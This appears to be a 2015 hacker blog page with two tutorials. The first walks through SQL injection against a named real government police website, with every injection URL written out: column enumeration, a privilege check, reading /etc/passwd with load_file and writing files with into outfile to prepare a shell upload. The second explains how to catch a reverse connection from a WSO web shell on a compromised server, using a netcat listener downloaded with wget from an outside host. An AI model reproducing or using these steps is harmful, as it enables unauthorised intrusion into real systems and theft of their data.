Thursday, December 24, 2015

SQLi Challenge Solution 2

Okay First hello to all :p .. The Method is used in this Challenge is Root Privilleges Method.

Okay then let's start :

1. First of all we'll see that site is vuln or not.

http://www.police.gov.bd/content.php?id=275' > Error :D Text disappeared it means it's vuln

2. Now Time to find which comment is working

http://www.police.gov.bd/content.php?id=275 order by 2222222-- > No error It means we've to try now String Based SQLi

http://www.police.gov.bd/content.php?id=275' order by 222222--+ > Error :D its working

2. Now We've to Dump Vuln Columns

http://www.police.gov.bd/content.php?id=275' order by 20--+ > error
http://www.police.gov.bd/content.php?id=275' order by 15--+ > No error
http://www.police.gov.bd/content.php?id=275' order by 17--+ > Error
http://www.police.gov.bd/content.php?id=275' order by 16--+ > No error

So, Total Columns are 16.

Now We've to dump Columns.

http://www.police.gov.bd/content.php?id=275' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+ > Vuln Columns is 3

3. Now we've to see that Website have root privilleges or not.

To see it we've to use this query.

(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

Use it in vuln column.

http://www.police.gov.bd/content.php?id=275' union select 1,2,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Yeahhhh :D it's showing root@localhost > Yes it means We've Root Privilleges access.

4. Now We've to Check website path for Upload shell

Users path exist in passwd file So, we'll load that file to see the path. For this we'll use following command :

load_file('/etc/passwd')

http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

:'( No luck no path there

5. If You can't able to find the path then remember tmp dir is always writable ^_^

To Upload file in tmp folder we'll use following Command

into outfile '/tmp/test.txt'

http://www.police.gov.bd/content.php?id=275' union select 1,2,'Testing',4,5,6,7,8,9,10,11,12,13,14,15,16 into outfile '/tmp/test.txt'--+

6. To Open your uploaded file We'll use load_file

http://www.police.gov.bd/content.php?id=275' union select 1,2,load_file('/tmp/test.txt'),4,5,6,7,8,9,10,11,12,13,14,15,16--+

Wahoooooo :)))) It's working .....

Hope You like my tutorial ( Solution of 2nd Challenge ) .

#D4RK_4NG31

Posted by at No comments:

Sunday, December 13, 2015

BackConnect Without Router

Hello Guys ! I know many people wants to root server but their internet don't forward port :)

But Now you can BackConnect with any Internet Connections.

So, Just Follow me :-

1. Make account on koding.com

2. Build VM It'll take time.

3. Upload NetCat with wget Function in Terminal. Command : wget -O netcat.zip http://anonpirates.ml/netcat-1.11.zip

4. Now Unzip netcat with this command : unzip netcat.zip
" Hurray ! We Install NetCat successfully :) "

5. Now execute this command : nc -lvp 1337

6. Now You'll see written " koding-vm-0 " in top left and in that option You'll see settings button.








7. Click on settings button and There You'll see Public IP,Copy that IP.

8. Now goto that Server in which you want to backconnect

9. Click on Network ( WSO Shell ) And now Paste Public IP in IP and Write 1337 in port and then click on connect.

10.Now go back to VM to see that it's connected or not. Execute this command : ls ( to check )

Yahooooooooo ! :D We Successfully BackConnect the server

Hope You Like my tutorial. Thanks to Kashmiri Cheetah

#D4RK_4NG31

Posted by at 3 comments:
Subscribe to: Posts (Atom)